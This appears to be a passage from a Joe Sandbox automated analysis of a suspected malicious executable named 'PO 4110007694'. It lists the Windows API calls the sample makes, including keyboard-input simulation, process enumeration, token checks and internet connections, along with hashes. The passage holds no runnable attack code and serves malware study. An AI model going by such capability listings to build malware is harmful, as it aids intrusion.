                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C988DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 00C9AB60
                                                                    • GetWindowRect.USER32(?,?), ref: 00C9ABD6
                                                                    • PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
                                                                    • MessageBeep.USER32(00000000), ref: 00C9AC57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C70B27
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C70B43
                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C70BA9
                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C70BFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C70C66
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C70C82
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C70CE1
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C70D33
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C461FB
                                                                    • __isleadbyte_l.LIBCMT ref: 00C46229
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C46257
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C4628D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
                                                                    • Instruction ID: d4d91f098c946f2cb0b31d7f01fca7d9e674b33a2acad11d1122e4710e12ebf7
                                                                    • Opcode Fuzzy Hash: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
                                                                    • Instruction Fuzzy Hash: DE31DE30600286BFDF318F65CC48BAE7BA9FF42310F154029E864971A5E770EA50DB92
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00C94F02
                                                                      • Part of subcall function 00C73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7365B
                                                                      • Part of subcall function 00C73641: GetCurrentThreadId.KERNEL32 ref: 00C73662
                                                                      • Part of subcall function 00C73641: AttachThreadInput.USER32(00000000,?,00C75005), ref: 00C73669
                                                                    • GetCaretPos.USER32(?), ref: 00C94F13
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00C94F4E
                                                                    • GetForegroundWindow.USER32 ref: 00C94F54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
                                                                    • Instruction ID: eb7b21a852ae0c26e284aaffc851f1007bae0e7ed6be3e24351ab3d786cd753e
                                                                    • Opcode Fuzzy Hash: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
                                                                    • Instruction Fuzzy Hash: ED311C71D00108AFDB10EFA5C885EEFB7FDEF99300F10406AE415E7241EA71AE459BA0
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C73C7A
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00C73C88
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00C73CA8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C73D52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: f6c08b04479d95b0fb60576733e7d9629c5df0732e0ba6e262bb6eea010617fd
                                                                    • Instruction ID: 9470812f0826d222e2fe4d3a32c8ad026b6638ed3e8f059b564a6af4fb587333
                                                                    • Opcode Fuzzy Hash: f6c08b04479d95b0fb60576733e7d9629c5df0732e0ba6e262bb6eea010617fd
                                                                    • Instruction Fuzzy Hash: 2B31CF31108344DFD310EF60C884AAEBBE8EF95300F40492DF495861A1EB719A8AEB92
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • GetCursorPos.USER32(?), ref: 00C9C4D2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C4B9AB,?,?,?,?,?), ref: 00C9C4E7
                                                                    • GetCursorPos.USER32(?), ref: 00C9C534
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C4B9AB,?,?,?), ref: 00C9C56E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
                                                                    • Instruction ID: c12037d22d156108eabff7e821ff74dbb52e163f1d6ef075be98b5222c9758d8
                                                                    • Opcode Fuzzy Hash: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
                                                                    • Instruction Fuzzy Hash: AA318F35600058AFCF158F98C89CEEE7BB5EB09310F45406AF9158B2A1C731AE61EBA4
                                                                    APIs
                                                                      • Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
                                                                      • Part of subcall function 00C6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
                                                                      • Part of subcall function 00C6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
                                                                      • Part of subcall function 00C6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
                                                                      • Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C686A3
                                                                    • _memcmp.LIBCMT ref: 00C686C6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C686FC
                                                                    • HeapFree.KERNEL32(00000000), ref: 00C68703
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    • Opcode ID: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
                                                                    • Instruction ID: fa569948783ea9de40e4f90032c12aae1255601535e53b35f187ede641f03d3b
                                                                    • Opcode Fuzzy Hash: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
                                                                    • Instruction Fuzzy Hash: 9421AF71E10109EFDB20DFA4C989BEEB7B9EF44304F158159E854AB240DB71EE09DB90
                                                                    APIs
                                                                    • __setmode.LIBCMT ref: 00C309AE
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                    • _fprintf.LIBCMT ref: 00C309E5
                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00C65DBB
                                                                      • Part of subcall function 00C34AAA: _flsall.LIBCMT ref: 00C34AC3
                                                                    • __setmode.LIBCMT ref: 00C30A1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                    • String ID:
                                                                    • API String ID: 521402451-0
                                                                    • Opcode ID: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
                                                                    • Instruction ID: a49e44ab010d1eabe67275ccf6513a7120ba90f5f894a1cce73937d00d46a481
                                                                    • Opcode Fuzzy Hash: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
                                                                    • Instruction Fuzzy Hash: 5C113A72914204AFDB08B7B4AC879FE7768DF82320F244015F105971C2EE30598677E1
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C817A3
                                                                      • Part of subcall function 00C8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
                                                                      • Part of subcall function 00C8182D: InternetCloseHandle.WININET(00000000), ref: 00C818E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
                                                                    • Instruction ID: c38049bb38c6b757ea4bb7fcc483d7727b519e5d5ec1fee16e8e11bacdb13982
                                                                    • Opcode Fuzzy Hash: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
                                                                    • Instruction Fuzzy Hash: 0721B031200605BFEB12AF609C05BBABBEDFB48714F15402EFD11D6591D7719912A7A8
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,00C9FAC0), ref: 00C73A64
                                                                    • GetLastError.KERNEL32 ref: 00C73A73
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C73A82
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C9FAC0), ref: 00C73ADF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
                                                                    • Instruction ID: 6d4998f2749193e1c765ee0c2ee59eb9f589097cbd7bad9a92dbd81b5281b699
                                                                    • Opcode Fuzzy Hash: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
                                                                    • Instruction Fuzzy Hash: B42196345082419F8700DF64C8469AA77E8AF55364F108A2DF4ADC72A1DB31DA46FB52
                                                                    APIs
                                                                      • Part of subcall function 00C6F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C6DCD3,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?), ref: 00C6F0CB
                                                                      • Part of subcall function 00C6F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C6DCD3,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6F0F1
                                                                      • Part of subcall function 00C6F0BC: lstrcmpiW.KERNEL32(00000000,?,00C6DCD3,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?), ref: 00C6F122
                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6DCEC
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6DD12
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6DD46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 42b66bad0dfad346d7b71a847a0310c95a6fd5f8ed279e33af0b531ea740b388
                                                                    • Instruction ID: 295ebe9d48e36966142b6ab5a69ec8a76c945dc140dac8786281d1b53966bbc9
                                                                    • Opcode Fuzzy Hash: 42b66bad0dfad346d7b71a847a0310c95a6fd5f8ed279e33af0b531ea740b388
                                                                    • Instruction Fuzzy Hash: CD11B136200305EBCB25AF34D885E7E77A8FF45310F40412AF916CB2A0EB719951D7E0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00C45101
                                                                      • Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                      • Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                      • Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(017A0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 0c1da0b230e5ce336545f6a48d938376deae0bba0a1fa17626ff119a1c6c4465
                                                                    • Instruction ID: 13edf516b30ecaceb460c4bb7d6bf55e017afab16dc87bef815bdeeb64ade081
                                                                    • Opcode Fuzzy Hash: 0c1da0b230e5ce336545f6a48d938376deae0bba0a1fa17626ff119a1c6c4465
                                                                    • Instruction Fuzzy Hash: 82112572910B16AFCF312F70EC45B6E3798BF043B1F20453AF9549A162DF348A41A790
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C144CF
                                                                      • Part of subcall function 00C1407C: _memset.LIBCMT ref: 00C140FC
                                                                      • Part of subcall function 00C1407C: _wcscpy.LIBCMT ref: 00C14150
                                                                      • Part of subcall function 00C1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00C14524
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C14533
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C4D4B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
                                                                    APIs
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00C86399
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C863A4
                                                                    • _memmove.LIBCMT ref: 00C863D1
                                                                    • inet_ntoa.WSOCK32(?), ref: 00C863DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 1504782959-0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00C68B61
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B73
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B89
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
